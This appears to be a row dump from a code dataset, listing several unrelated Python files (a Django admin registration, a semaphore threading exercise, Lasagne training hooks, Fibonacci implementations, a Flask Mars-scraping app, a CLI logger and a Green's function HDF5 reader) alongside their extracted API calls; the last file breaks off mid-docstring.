| code (string, 22 to 1.05M chars) | apis (list, 1 to 3.31k entries) | extract_api (string, 75 to 3.25M chars) |
|---|---|---|
from django.contrib import admin
from .models import Dish
# Register your models here.
admin.site.register(Dish)
|
[
"django.contrib.admin.site.register"
] |
[((87, 112), 'django.contrib.admin.site.register', 'admin.site.register', (['Dish'], {}), '(Dish)\n', (106, 112), False, 'from django.contrib import admin\n')]
|
#!/usr/bin/python3
'''
############################################################################
->Authors:
-<NAME>
-<NAME>
->Creation date: 01/11/2020
->Description: Analysis and solution of the 'students and the advisor' problem
############################################################################
'''
import threading
import random
import time
def alumnos(id):
#Number of questions the student will ask; it can be from 1 to 10 questions
num_preguntas = random.randint(1, 10)
while num_preguntas > 0:
#The student tries to get a chair
sillas.acquire()
print('---->Student %d got a chair' %id)
#The list is used to know which students occupy chairs
alumnos_en_silla.append(id)
mutex_primer_alumno.acquire()
#If this is the first student to get a chair, wake up the professor
if len(alumnos_en_silla) == 1:
profe_dormido.release()
mutex_primer_alumno.release()
#Decrease the number of the student's remaining questions
num_preguntas = num_preguntas - 1
print('-------->Student %d has NO more questions, leaving now' %id)
def profe():
while True:
#If there are students occupying chairs, answer a question
if len(alumnos_en_silla) > 0:
print('------>Answering a question...')
time.sleep(random.random())
alumno_id = alumnos_en_silla.pop()
print('->Question of student %d answered' %alumno_id)
sillas.release()
print('Student %d left the chair' %alumno_id)
#Otherwise, the professor goes to sleep
else:
print('->Professor resting')
profe_dormido.acquire()
print('->Professor awake')
#Maximum number of students
num_alumno = 10
#Maximum number of chairs in the office
num_sillas = 2
#List of seated students
alumnos_en_silla = []
#Creating semaphores
sillas = threading.Semaphore(num_sillas)
profe_dormido = threading.Semaphore(0)
mutex_primer_alumno = threading.Semaphore(1)
#Creating threads
threading.Thread(target=profe).start()
for alumno_id in range(num_alumno):
threading.Thread(target=alumnos,args=[alumno_id]).start()
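#Note on the synchronization design (added commentary, not part of the original
#exercise): sillas is a counting semaphore that bounds how many students can sit
#down at once, profe_dormido starts at 0 and works as a wake-up signal for the
#professor, and mutex_primer_alumno is a binary semaphore protecting the
#"am I the first seated student?" check. The shared list alumnos_en_silla is
#appended to by the students and popped by the professor.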
|
[
"threading.Thread",
"random.random",
"threading.Semaphore",
"random.randint"
] |
[((1942, 1973), 'threading.Semaphore', 'threading.Semaphore', (['num_sillas'], {}), '(num_sillas)\n', (1961, 1973), False, 'import threading\n'), ((1990, 2012), 'threading.Semaphore', 'threading.Semaphore', (['(0)'], {}), '(0)\n', (2009, 2012), False, 'import threading\n'), ((2035, 2057), 'threading.Semaphore', 'threading.Semaphore', (['(1)'], {}), '(1)\n', (2054, 2057), False, 'import threading\n'), ((493, 514), 'random.randint', 'random.randint', (['(1)', '(10)'], {}), '(1, 10)\n', (507, 514), False, 'import random\n'), ((2074, 2104), 'threading.Thread', 'threading.Thread', ([], {'target': 'profe'}), '(target=profe)\n', (2090, 2104), False, 'import threading\n'), ((2154, 2204), 'threading.Thread', 'threading.Thread', ([], {'target': 'alumnos', 'args': '[alumno_id]'}), '(target=alumnos, args=[alumno_id])\n', (2170, 2204), False, 'import threading\n'), ((1388, 1403), 'random.random', 'random.random', ([], {}), '()\n', (1401, 1403), False, 'import random\n')]
|
"""Defines hooks that can run during training."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import lasagne
import numpy as np
from sklearn import metrics
class LoggingHook(object):
"""This hook writes information to a log file."""
def __init__(self, logger):
"""Initializes a new instance of the LoggingHook class.
Args:
logger: A logger instance.
"""
self._logger = logger
def update(self, **kwargs):
"""Executes the hook.
Args:
**kwargs: Optimizer state dictionary.
"""
self._logger.log(
key="status",
message="Log at iteration %d" % kwargs["update_counter"]
)
self._logger.log(
key="update_counter",
message=kwargs["update_counter"]
)
self._logger.log(
key="update_runtime",
message=kwargs["runtime"]
)
self._logger.log(
key="losses",
message=np.asarray(kwargs["losses"])
)
class SnapshotHook(object):
"""Hook for storing snapshots of the network's weights."""
def __init__(self, filename, network, interval):
"""Initializes a new instance of the SnapshotHook class.
Args:
filename: The base filename of the model.
network: The network instance to store.
interval: The snapshot interval.
"""
self._filename = filename
self._network = network
self._interval = interval
def update(self, **kwargs):
"""Executed the hook.
Args:
**kwargs: The optimizer dictionary.
"""
# Run the hook now?
if kwargs["update_counter"] % self._interval == 0:
# Yes
np.savez(
"%s_snapshot_%d.npz" % (
self._filename, kwargs["update_counter"]),
*lasagne.layers.get_all_param_values(self._network))
class SegmentationValidationHook(object):
"""Performs a validation run for semantic segmentation."""
def __init__(self, val_fn, data_provider, logger, interval=300,
num_classes=19):
"""Initializes a new instance of the SegmentationValidationHook class.
Args:
val_fn: A function that returns the predictions for each image and
a list of losses.
data_provider: A chianti data provider.
logger: A logger instance.
interval: The validation interval.
num_classes: The number of semantic segmentation classes.
"""
self._val_fn = val_fn
self._data_provider = data_provider
self._logger = logger
self._interval = interval
self._num_classes = num_classes
def update(self, **kwargs):
"""Runs the validation hook."""
update_now = kwargs["update_counter"] % self._interval == 0
if update_now and kwargs["update_counter"] > 0:
self._logger.log(
key="validation_checkpoint",
message=kwargs["update_counter"]
)
self._logger.log(
key="status",
message="-> Start validation run"
)
# Initialize the confusion matrix
conf_matrix = np.zeros(
(self._num_classes, self._num_classes)).astype('int64')
accumulated_loss = 0
self._data_provider.reset()
for batch_counter in range(self._data_provider.get_num_batches()):
self._logger.log(
key="status",
message="--> Validate batch %d/%d" % (
batch_counter + 1,
self._data_provider.get_num_batches()))
batch = self._data_provider.next()
images = batch[0]
targets = batch[1]
predictions, loss = self._val_fn(images, targets)
accumulated_loss += loss
# Mark the don't care predictions
# Flatten the predictions and targets
flat_predictions = predictions.flatten()
non_void_pixels = (np.max(targets, axis=1) != 0.0).flatten()
flat_targets = np.argmax(targets, axis=1).flatten()
# Select the non-don't cares
flat_targets = flat_targets[non_void_pixels]
flat_predictions = flat_predictions[non_void_pixels]
conf_matrix += metrics.confusion_matrix(
flat_targets,
flat_predictions,
labels=np.arange(self._num_classes, dtype='int64'))
accumulated_loss /= self._data_provider.get_num_batches()
self._logger.log(
key="conf_matrix",
message=conf_matrix
)
self._logger.log(
key="validation_loss",
message=accumulated_loss
)
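# A minimal usage sketch (an assumption, not part of the original module): the
# hooks above only expose an update(**kwargs) method, so a training loop is
# expected to call them with the keys they read ("update_counter", "runtime",
# "losses"). The names hooks, train_fn, num_updates and logger below are
# hypothetical.
#
#     hooks = [LoggingHook(logger), SnapshotHook("model", network, interval=1000)]
#     for update_counter in range(num_updates):
#         start = time.time()
#         losses = train_fn()
#         for hook in hooks:
#             hook.update(update_counter=update_counter,
#                         runtime=time.time() - start,
#                         losses=losses)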
|
[
"lasagne.layers.get_all_param_values",
"numpy.argmax",
"numpy.asarray",
"numpy.zeros",
"numpy.max",
"numpy.arange"
] |
[((1068, 1096), 'numpy.asarray', 'np.asarray', (["kwargs['losses']"], {}), "(kwargs['losses'])\n", (1078, 1096), True, 'import numpy as np\n'), ((1983, 2033), 'lasagne.layers.get_all_param_values', 'lasagne.layers.get_all_param_values', (['self._network'], {}), '(self._network)\n', (2018, 2033), False, 'import lasagne\n'), ((3309, 3357), 'numpy.zeros', 'np.zeros', (['(self._num_classes, self._num_classes)'], {}), '((self._num_classes, self._num_classes))\n', (3317, 3357), True, 'import numpy as np\n'), ((4278, 4304), 'numpy.argmax', 'np.argmax', (['targets'], {'axis': '(1)'}), '(targets, axis=1)\n', (4287, 4304), True, 'import numpy as np\n'), ((4648, 4691), 'numpy.arange', 'np.arange', (['self._num_classes'], {'dtype': '"""int64"""'}), "(self._num_classes, dtype='int64')\n", (4657, 4691), True, 'import numpy as np\n'), ((4205, 4228), 'numpy.max', 'np.max', (['targets'], {'axis': '(1)'}), '(targets, axis=1)\n', (4211, 4228), True, 'import numpy as np\n')]
|
# Implementations done in Python since it natively supports unbounded integer
# arithmetic and fractional math
#Compiled with Python 2.7.3 (default, Apr 10 2012, 23:31:26) [MSC v.1500 32 bit (Intel)] on win32
#in IDLE version 2.7.3
#For profiling (written in C to avoid overhead)
import cProfile
# to deal with fractions
from fractions import Fraction
global called
global countAdd
global countSub
global countMult
called = 0
countAdd = 0
countSub = 0
countMult = 0
#Recursive implementation based on text
def fibonacci(n, count = False):
global called
global countAdd
global countSub
global countMult
if count == True:
called += 1
if n<=2:
return 1
else:
if count == True:
countAdd += 1
countSub += 2
return fibonacci(n-1, count)+fibonacci(n-2, count)
'''
For n = 10:
Counts 54 additions vs 52 predicted (not sure why?)
Counts 108 Subtractions vs 104 predicted (not sure why?)
109 Calls implying 55 calls of cost zero
Implementation is Robust (no possibility of rounding error)
& unbounded integer arithmetic in python
Implementation is very slow for n > 60 (because of the
many duplicated recursive calls, as shown in the tree
from Q4); with count = True it is slow for n > 40
It will also fail completely because of the limit
on recursion (of course, any implementation will
eventually fail unless storage can grow faster than the required
memory)
'''
#Loop implementation (differs slightly from design to be more storage efficient)
def fibLoop(n, count = False):
global called
global countAdd
global countSub
global countMult
fib1 = 1
fib2 = 1
for i in range(2,n):
if count == True:
countAdd += 1
newfib = fib1 + fib2
fib1 = fib2
fib2 = newfib
return fib2
'''
For n = 10:
Counts 8 additions, as predicted
Counts 0 Subtractions vs 16 predicted, since we didn't use
a list, but it performs 16 additional assignments instead
Implementation is Robust (no possibility of rounding error)
& unbounded integer arithmetic in python
n = 100,000 --> 0.166 seconds
n = 1,000,000 --> 14.028 seconds
'''
#Direct implementation subject to rounding errors for n > 71
def fibDirect(n, count = False):
global called
global countAdd
global countSub
global countMult
rFive = (5**0.5)
if count == True:
countMult += 2*(n-1) + 2 #uses Naive assumption for how
countSub += 2 # power function works
countAdd += 1
c = 1/rFive
a = ((1+rFive)/2)**n
b = ((1-rFive)/2)**n
return int(c*(a-b))
'''
For n = 10:
Counts 1 addition, as predicted
Counts 2 Subtractions as predicted
Counts 20 Multiplications as predicted (but this is based on a
Naive assumption of how exponentiation is implemented)
Implementation is NOT Robust; we start getting rounding error
at n = 72
Since it is not robust, and the results we are interested in are
exact integers, it isn't really relevant when it fails (i.e.
it is unreliable for n > 71)
Maybe if we were interested in ratios, we could still use it
(but why bother since there are better methods?)
Fails for n > 1475 --> Overflow
Python only supports unbounded *integer* arithmetic :)
'''
# Robust Direct implementation (uses helper functions below)
def betterFibDirect(n, count = False):
global called
global countAdd
global countSub
global countMult
if count == True:
countSub += 1
a = rFivePow((Fraction(1,2),Fraction(1,2)),n, count)
b = rFivePow((Fraction(1,2),Fraction(-1,2)),n, count)
return int(a[1]-b[1])
'''
For n = 10:
Counts 36 additions (no prediction)
Counts 1 Subtraction (no prediction)
Counts 90 Multiplications (no prediction) - based on Naive exponentiation
but these are fractional multiplications
Implementation is Robust! Since there is no possibility of rounding error
because we are dealing with only integers (and fractions)
n = 100,000 --> 69.411 seconds
n = 1,000,000 --> > 20 minutes
This is as far as I'm willing to go with this one. I don't think
it will actually fail until we run out of memory, but it does get slower
and slower because of the multiplication of large numbers
Also: see NOTE after the next function
'''
# Robust Direct implementation (uses helper functions below)
# cuts our multiplications and additions in two
# I forgot to do this in the first implementation: D'Oh!
def muchBetterFibDirect(n, count = False):
global called
global countAdd
global countSub
global countMult
if count == True:
countSub += 1
a = rFivePow((Fraction(1,2),Fraction(1,2)),n, count)
b = a[0],-a[1] ## Altered Line
return int(a[1]-b[1])
'''
For n = 10:
Counts 18 additions as predicted
Counts 1 Subtraction as before
Counts 45 Multiplications as predicted
but these are fractional multiplications
Implementation is Robust! Since there is no possibility of rounding
error because we are dealing with only integers (and fractions)
n = 100,000 --> 37.039 seconds
NOTE: We should be able to make this implementation much better
by implementing exponentiation in a smarter way, but it will
probably only compete with fibLoop if we implement a table
to look up our exponents, in which case we might as well store
the fibonacci numbers themselves... unless we want to compute
other fibonacci-like sequences easily...
'''
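# A possible follow-up to the NOTE above (a sketch of mine, not part of the
# original submission): exponentiation by squaring cuts the number of rFiveMult
# calls from n-1 down to O(log n). The name fastRFivePow is hypothetical.
def fastRFivePow(x, n, count = False):
    # multiplicative identity 1 + 0*sqrt(5)
    result = (Fraction(1), Fraction(0))
    base = x
    while n > 0:
        if n % 2 == 1:
            result = rFiveMult(base, result, count)
        base = rFiveMult(base, base, count)
        n //= 2
    return result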
# A better recursive implementation that avoids duplication of labour
def betterFibonacci(n, count = False):
global called
global countAdd
global countSub
global countMult
if count == True:
called += 1
if n<=2:
return (1,1)
else:
if count == True:
countAdd += 1
countSub += 1
pair = betterFibonacci(n-1, count)
return (pair[1],pair[0]+pair[1])
'''
For n = 10:
Counts 8 additions, as expected (see the graph in Q4)
Counts 8 Subtractions, as expected
9 calls as expected (vs 109 for the Naive implementation)
Implementation is Robust, since there is no possibility of rounding error
Fails for n > 991 --> Maximum Recursion depth exceeded
This is a python consideration to protect from catastrophic
failure (likely our Naive implementation would also fail here
if not a little earlier, but I don't have time to wait for that)
'''
###########################################################
# HELPER FUNCTIONS #
###########################################################
# Exact multiplication for numbers of the form x+y*sqrt(5)
def rFiveMult(n,m, count = False):
global called
global countAdd
global countSub
global countMult
if count == True:
countMult += 5
countAdd += 2
return (m[0]*n[0]+m[1]*n[1]*5,m[0]*n[1]+m[1]*n[0])
# Naive power function for numbers of the form x+y*sqrt(5)
def rFivePow(x,n, count = False):
global called
global countAdd
global countSub
global countMult
result = x
for i in range(1,n):
result = rFiveMult(x,result, count)
return result
# Reset the global counters
def resetCount():
global called
global countAdd
global countSub
global countMult
called = 0
countAdd = 0
countSub = 0
countMult = 0
def printResults(n):
global called
global countAdd
global countSub
global countMult
print(n)
print ("\n")
print("Additions: " + str(countAdd))
print("Subtractions: " + str(countSub))
print ("Multiplications: " + str(countMult))
print ("Calls: " + str(called))
resetCount()
if __name__ == "__main__":
done = False
while not done:
resetCount()
n = input("Enter a non-negative integer: ")
print ("\n")
#''' Remove # before and after blocks to comment out
print("fibonacci("+str(n) + ") = ")
printResults(fibonacci(n, True))
cProfile.run('fibonacci(n)')
#'''
#'''
print("fibLoop("+str(n) + ") = ")
printResults(fibLoop(n, True))
cProfile.run('fibLoop(n)')
#'''
#'''
print("fibDirect("+str(n) + ") = ")
printResults(fibDirect(n, True))
cProfile.run('fibDirect(n)')
#'''
''' # replaced with muchBetterFibDirect
print("betterFibDirect("+str(n) + ") = ")
printResults(betterFibDirect(n, True))
cProfile.run('betterFibDirect(n)')
'''
#'''
print("muchBetterFibDirect("+str(n) + ") = ")
printResults(muchBetterFibDirect(n, True))
cProfile.run('muchBetterFibDirect(n)')
#'''
#'''
print("betterFibonacci("+str(n) + ") = ")
printResults(betterFibonacci(n, True)[1])
cProfile.run('betterFibonacci(n)')
#'''
print ("\n")
s = raw_input("Exit? Y/N ").lower()
if s == 'y':
done = True
|
[
"fractions.Fraction",
"cProfile.run"
] |
[((8040, 8068), 'cProfile.run', 'cProfile.run', (['"""fibonacci(n)"""'], {}), "('fibonacci(n)')\n", (8052, 8068), False, 'import cProfile\n'), ((8185, 8211), 'cProfile.run', 'cProfile.run', (['"""fibLoop(n)"""'], {}), "('fibLoop(n)')\n", (8197, 8211), False, 'import cProfile\n'), ((8340, 8368), 'cProfile.run', 'cProfile.run', (['"""fibDirect(n)"""'], {}), "('fibDirect(n)')\n", (8352, 8368), False, 'import cProfile\n'), ((8718, 8756), 'cProfile.run', 'cProfile.run', (['"""muchBetterFibDirect(n)"""'], {}), "('muchBetterFibDirect(n)')\n", (8730, 8756), False, 'import cProfile\n'), ((8892, 8926), 'cProfile.run', 'cProfile.run', (['"""betterFibonacci(n)"""'], {}), "('betterFibonacci(n)')\n", (8904, 8926), False, 'import cProfile\n'), ((3554, 3568), 'fractions.Fraction', 'Fraction', (['(1)', '(2)'], {}), '(1, 2)\n', (3562, 3568), False, 'from fractions import Fraction\n'), ((3568, 3582), 'fractions.Fraction', 'Fraction', (['(1)', '(2)'], {}), '(1, 2)\n', (3576, 3582), False, 'from fractions import Fraction\n'), ((3611, 3625), 'fractions.Fraction', 'Fraction', (['(1)', '(2)'], {}), '(1, 2)\n', (3619, 3625), False, 'from fractions import Fraction\n'), ((3625, 3640), 'fractions.Fraction', 'Fraction', (['(-1)', '(2)'], {}), '(-1, 2)\n', (3633, 3640), False, 'from fractions import Fraction\n'), ((4693, 4707), 'fractions.Fraction', 'Fraction', (['(1)', '(2)'], {}), '(1, 2)\n', (4701, 4707), False, 'from fractions import Fraction\n'), ((4707, 4721), 'fractions.Fraction', 'Fraction', (['(1)', '(2)'], {}), '(1, 2)\n', (4715, 4721), False, 'from fractions import Fraction\n')]
|
#Get dependencies
from flask import Flask, render_template, redirect
import pymongo
import mission_to_mars
import jinja2
from jinja2 import TemplateNotFound
#Create Flask App
app = Flask(__name__)
#Connect to MongoDB
conn = "mongodb://localhost:27017"
client = pymongo.MongoClient(conn)
db = client.mars_DB
@app.route("/")
def index():
mars = db.mars_data.find_one()
return render_template("index.html", mars=mars)
@app.route("/scrape")
def scrape():
mars_data = mission_to_mars.scrape()
db.mars_data.update(
{},
mars_data,
upsert=True
)
return redirect("http://localhost:5000/", code=302)
if __name__ == "__main__":
app.run(debug=True)
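# Usage sketch (added commentary, not part of the original app): with MongoDB
# listening on localhost:27017 and a mission_to_mars module providing scrape(),
# running this file starts the Flask dev server; GET /scrape re-scrapes, upserts
# the single mars_data document and redirects to "/", which renders index.html
# with that document.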
|
[
"pymongo.MongoClient",
"mission_to_mars.scrape",
"flask.redirect",
"flask.Flask",
"flask.render_template"
] |
[((189, 204), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (194, 204), False, 'from flask import Flask, render_template, redirect\n'), ((274, 299), 'pymongo.MongoClient', 'pymongo.MongoClient', (['conn'], {}), '(conn)\n', (293, 299), False, 'import pymongo\n'), ((402, 442), 'flask.render_template', 'render_template', (['"""index.html"""'], {'mars': 'mars'}), "('index.html', mars=mars)\n", (417, 442), False, 'from flask import Flask, render_template, redirect\n'), ((500, 524), 'mission_to_mars.scrape', 'mission_to_mars.scrape', ([], {}), '()\n', (522, 524), False, 'import mission_to_mars\n'), ((624, 668), 'flask.redirect', 'redirect', (['"""http://localhost:5000/"""'], {'code': '(302)'}), "('http://localhost:5000/', code=302)\n", (632, 668), False, 'from flask import Flask, render_template, redirect\n')]
|
# -*- coding: utf-8 -*-
"""
xobox.cli.logger
~~~~~~~~~~~~~~~~
:copyright: Copyright 2017 by the Stormrose Project team, see AUTHORS.
:license: MIT License, see LICENSE for details.
"""
import sys
from datetime import datetime
from ..conf import get_conf
from ..utils.singleton import Singleton
from ..utils import termcolor
from ..utils.timer import counter
Levels = {
'mute': (0, '', ''),
'error': (1, 'ERROR', 'LOG_ERR'),
'warning': (2, 'WARN ', 'LOG_WARNING'),
'notice': (3, 'NOTE ', 'LOG_NOTICE'),
'info': (4, 'INFO ', 'LOG_INFO'),
'debug': (5, 'DEBUG', 'LOG_DEBUG')
}
@Singleton
class Logger(object):
"""
Class providing the output interface for various output channels. Currently,
supported output channels are
* the terminal (stdout and stderr)
* files accessible through the local file system
.. note::
Please note that the :py:class:`~xobox.cli.logger.Logger` class is a
decorated singleton, which means instances cannot be retrieved directly,
but must be obtained using the :py:meth:`~xobox.cli.logger.Logger.get_instance`
method.
The following key word arguments are understood:
:param str type: Type of this logger. Must be one of `file` or `term`.
:param str level: Minimum level for logging. Must be one of `mute`, `error`, `warning`, `notice`, `info` or `debug`.
:param str file: Path of the log file to log into if type is set to `file`.
:param bool color: Allow colored logging (only effective if type is set to `term`)
"""
def __init__(self, *args, **kwargs):
self._levels = Levels
self._level = get_conf('DEFAULT_LOG_LEVEL')
self._type = get_conf('DEFAULT_LOG_TYPE')
self._logfile = get_conf('DEFAULT_LOG_FILE')
self._queue = None
self._init_queue()
self._fp_std = None
self._fp_err = None
color_candidate = get_conf('DEFAULT_LOG_COLOR')
# Check for positional arguments
if len(args) > 0 and args[0] in ('file', 'term'):
self._type = args[0]
if len(args) > 1 and args[1] in self._levels:
self._level = args[1]
if len(args) > 2 and type(args[2]) == str:
self._logfile = args[2]
if len(args) > 3 and type(args[3]) == bool:
color_candidate = args[3]
# Check for keyword arguments
if 'type' in kwargs and kwargs['type'] in ('file', 'term'):
self._type = kwargs['type']
if 'level' in kwargs and kwargs['level'] in self._levels:
self._level = kwargs['level']
if 'file' in kwargs:
self._logfile = kwargs['file']
if 'color' in kwargs and type(kwargs['color']) == bool:
color_candidate = kwargs['color']
# finally decide about color support and open the log channel
if termcolor.supports_color() and self._type == 'term':
self._color = color_candidate
else:
self._color = False
self._open()
def _open(self):
"""Open the log channel"""
if self._type == 'term':
self._fp_std = sys.stdout
self._fp_err = sys.stderr
elif self._type == 'file':
# enforce lazy behaviour
self._fp_std = None
self._fp_err = None
def _close(self):
"""Close the current log channel"""
if self._type == 'term':
self._fp_std = None
self._fp_err = None
elif self._type == 'file':
self._fp_std.close()
self._fp_err = None
def _init_queue(self):
"""Initialise message queue"""
self._queue = {
'std': {},
'err': {}
}
def _flush(self):
"""Flush log queue to the log channel"""
if self._type == 'term':
self._flush_term()
elif self._type == 'file':
self._flush_file()
self._init_queue()
def _flush_term(self):
"""Flush implementation for terminal logging"""
self._flush_term_err(self._queue['err'])
self._flush_term_std(self._queue['std'])
def _flush_term_std(self, queue):
"""Flushes the stdout message queue on a terminal"""
for msg in sorted(queue.keys()):
print(queue[msg][1], file=self._fp_std)
def _flush_term_err(self, queue):
"""Flushes the stderr message queue on a terminal"""
for msg in sorted(queue.keys()):
print(queue[msg][1], file=self._fp_err)
def _flush_file(self):
"""Flush implementation for file logging (lazy)"""
if not self._fp_std:
self._fp_std = open(self._logfile, encoding=get_conf('DEFAULT_CHARSET'), mode='a+')
padding = len("[{}] [ ]".format(datetime.now().strftime(get_conf('DEFAULT_LOG_TIMESTAMP')))) * " "
queue = dict(self._queue['err'])
queue.update(self._queue['std'])
for msg in sorted(queue.keys()):
# noinspection PyTypeChecker
msg_lines = queue[msg][1].splitlines()
# noinspection PyTypeChecker
print(
"[{date}] [{level}] {message}".format(
date=datetime.now().strftime(get_conf('DEFAULT_LOG_TIMESTAMP')),
level=self._levels[queue[msg][0]][1],
message=msg_lines[0]
),
file=self._fp_std
)
for msg_line in msg_lines[1:]:
# noinspection PyTypeChecker
print("{padding} {message}".format(padding=padding, message=msg_line), file=self._fp_std)
def log(self, level, message):
"""Register a log message within the logging queue"""
# log usage messages only on a terminal
if level == 'usage':
if self._type == 'term':
self._queue['err'][counter()] = (level, message)
# otherwise, log messages if their level is appropriate
if level in self._levels and self._levels[self._level][0] >= self._levels[level][0]:
if level == 'error':
self._queue['err'][counter()] = (level, message)
else:
self._queue['std'][counter()] = (level, message)
self._flush()
def log_error(self, message):
"""Convenience shortcut for registering messages with log level `error`"""
self.log('error', message)
def log_warning(self, message):
"""Convenience shortcut for registering messages with log level `warning`"""
self.log('warning', message)
def log_notice(self, message):
"""Convenience shortcut for registering messages with log level `notice`"""
self.log('notice', message)
def log_info(self, message):
"""Convenience shortcut for registering messages with log level `info`"""
self.log('info', message)
def log_debug(self, message):
"""Convenience shortcut for registering messages with log level `debug`"""
self.log('debug', message)
def log_usage(self, message):
"""Convenience shortcut for registering messages with log level `usage`"""
self.log('usage', message)
@property
def color(self):
"""
Boolean switch indicating whether this logger allows colored output.
"""
return self._color
@color.setter
def color(self, value):
if termcolor.supports_color() and self._type == 'term' and type(value) == bool:
self._color = value
@property
def file(self):
"""
The log file used when run as file logger.
"""
return self._logfile
@file.setter
def file(self, value):
self._logfile = value
if self._type == 'file':
self._close()
self._open()
@property
def level(self):
"""
The log level. Expected to be one of `mute`, `error`, `warning`, `notice`, `info` or `debug`.
"""
return self._level
@level.setter
def level(self, value):
if value in self._levels:
self._level = value
@property
def type(self):
"""
The logger type. Expected to be one of `term` or `file`.
"""
return self._type
@type.setter
def type(self, value):
if value in ('file', 'term'):
self._close()
self._type = value
self._open()
if value == 'file':
self._color = False
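# A minimal usage sketch (an assumption, not part of the original module): the
# class docstring states that Logger is a decorated singleton retrieved through
# Logger.get_instance(), which the Singleton decorator is assumed to provide, so
# a terminal logging session might look like:
#
#     log = Logger.get_instance('term', 'debug')
#     log.log_info('starting up')
#     log.log_error('something went wrong')  # queued for stderr
#     log.log_debug('details...')            # shown because the level is debug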
|
[
"datetime.datetime.now"
] |
[((4827, 4841), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (4839, 4841), False, 'from datetime import datetime\n'), ((5249, 5263), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (5261, 5263), False, 'from datetime import datetime\n')]
|
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (c), Forschungszentrum Jülich GmbH, IAS-1/PGI-1, Germany. #
# All rights reserved. #
# This file is part of the Masci-tools package. #
# (Material science tools) #
# #
# The code is hosted on GitHub at https://github.com/judftteam/masci-tools. #
# For further information on the license, see the LICENSE.txt file. #
# For further information please visit http://judft.de/. #
# #
###############################################################################
"""
This module contains utility and functions to work with Green's functions calculated
and written to ``greensf.hdf`` files by fleur
"""
from collections import namedtuple
from itertools import groupby
import numpy as np
import h5py
from masci_tools.io.parsers.hdf5 import HDF5Reader
from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation
from masci_tools.util.constants import HTR_TO_EV
GreensfElement = namedtuple('GreensfElement',
['l', 'lp', 'atomType', 'atomTypep', 'sphavg', 'onsite', 'contour', 'nLO', 'atomDiff'])
def _get_sphavg_recipe(group_name, index, contour):
"""
Get the HDF5Reader recipe for reading in a spherically averaged Green's function element
:param group_name: str of the group containing the Green's function elements
:param index: integer index of the element to read in (indexing starts at 1)
:param contour: integer index of the energy contour to read in (indexing starts at 1)
:returns: dict with the recipe reading all the necessary information from the ``greensf.hdf`` file
"""
return {
'datasets': {
'sphavg': {
'h5path':
f'/{group_name}/element-{index}/sphavg',
'transforms': [
Transformation(name='convert_to_complex_array', args=(), kwargs={}),
Transformation(name='multiply_scalar', args=(1.0 / HTR_TO_EV,), kwargs={})
]
},
'energy_points': {
'h5path':
f'/EnergyContours/contour-{contour}/ContourPoints',
'transforms': [
Transformation(name='convert_to_complex_array', args=(), kwargs={}),
AttribTransformation(name='shift_by_attribute',
attrib_name='fermi_energy',
args=(),
kwargs={
'negative': True,
}),
Transformation(name='multiply_scalar', args=(HTR_TO_EV,), kwargs={})
]
},
'energy_weights': {
'h5path':
f'/EnergyContours/contour-{contour}/IntegrationWeights',
'transforms': [
Transformation(name='convert_to_complex_array', args=(), kwargs={}),
Transformation(name='multiply_scalar', args=(HTR_TO_EV,), kwargs={})
]
}
},
'attributes': {
'fermi_energy': {
'h5path':
'/general',
'description':
'fermi_energy of the system',
'transforms': [
Transformation(name='get_attribute', args=('FermiEnergy',), kwargs={}),
Transformation(name='get_first_element', args=(), kwargs={})
]
},
'spins': {
'h5path':
'/general',
'description':
'number of spins',
'transforms': [
Transformation(name='get_attribute', args=('spins',), kwargs={}),
Transformation(name='get_first_element', args=(), kwargs={})
]
},
'mperp': {
'h5path':
'/general',
'description':
'Switch whether spin offdiagonal elements are included',
'transforms': [
Transformation(name='get_attribute', args=('mperp',), kwargs={}),
Transformation(name='get_first_element', args=(), kwargs={}),
Transformation(name='apply_lambda', args=(lambda x: x == 1,), kwargs={})
]
},
'lmax': {
'h5path':
f'/{group_name}',
'description':
'Maximum l considered (Determines size of the matrix)',
'transforms': [
Transformation(name='get_attribute', args=('maxl',), kwargs={}),
Transformation(name='get_first_element', args=(), kwargs={})
]
},
}
}
def _get_radial_recipe(group_name, index, contour):
"""
Get the HDF5Reader recipe for reading in a radial Green's function element
:param group_name: str of the group containing the Green's function elements
:param index: integer index of the element to read in (indexing starts at 1)
:param contour: integer index of the energy contour to read in (indexing starts at 1)
:returns: dict with the recipe reading all the necessary information from the ``greensf.hdf`` file
"""
recipe = _get_sphavg_recipe(group_name, index, contour)
recipe['datasets'].pop('sphavg')
recipe['datasets']['coefficients'] = {
'h5path':
f'/{group_name}/element-{index}',
'transforms': [
Transformation(name='get_all_child_datasets',
args=(),
kwargs={'ignore': ['scalarProducts', 'LOContribution']}),
Transformation(name='convert_to_complex_array', args=(), kwargs={}),
Transformation(name='multiply_scalar', args=(1.0 / HTR_TO_EV,), kwargs={})
],
'unpack_dict':
True
}
recipe['attributes']['scalarProducts'] = {
'h5path': f'/{group_name}/element-{index}/scalarProducts',
'transforms': [Transformation(name='get_all_child_datasets', args=(), kwargs={})]
}
recipe['attributes']['radialFunctions'] = {
'h5path': '/RadialFunctions',
'transforms': [Transformation(name='get_all_child_datasets', args=(), kwargs={})]
}
return recipe
def _get_greensf_group_name(hdffile):
"""
Return the name of the group containing the Green's function elements
:param hdffile: h5py.File of the greensf.hdf file
:returns: str of the group name containing the Green's Function elements
"""
if '/GreensFunctionElements' in hdffile:
return 'GreensFunctionElements'
elif '/Hubbard1Elements' in hdffile:
return 'Hubbard1Elements'
def _read_element_header(hdffile, index):
"""
Read the attributes of the given green's function elements
:param hdffile: h5py.File of the greensf.hdf file
:param index: integer index of the element to read in (indexing starts at 1)
:returns: :py:class:`GreensfElement` corresponding to the read in attributes
"""
group_name = _get_greensf_group_name(hdffile)
element = hdffile.get(f'/{group_name}/element-{index}')
l = element.attrs['l'][0]
lp = element.attrs['lp'][0]
atomType = element.attrs['atomType'][0]
atomTypep = element.attrs['atomTypep'][0]
sphavg = element.attrs['l_sphavg'][0] == 1
onsite = element.attrs['l_onsite'][0] == 1
contour = element.attrs['iContour'][0]
atomDiff = np.array(element.attrs['atomDiff'])
atomDiff[abs(atomDiff) < 1e-12] = 0.0
nLO = element.attrs['numLOs'][0]
return GreensfElement(l, lp, atomType, atomTypep, sphavg, onsite, contour, nLO, atomDiff)
def _read_gf_element(file, index):
"""
Read the information needed for a given Green's function element form a ``greensf.hdf``
file
:param file: filepath or handle to be read
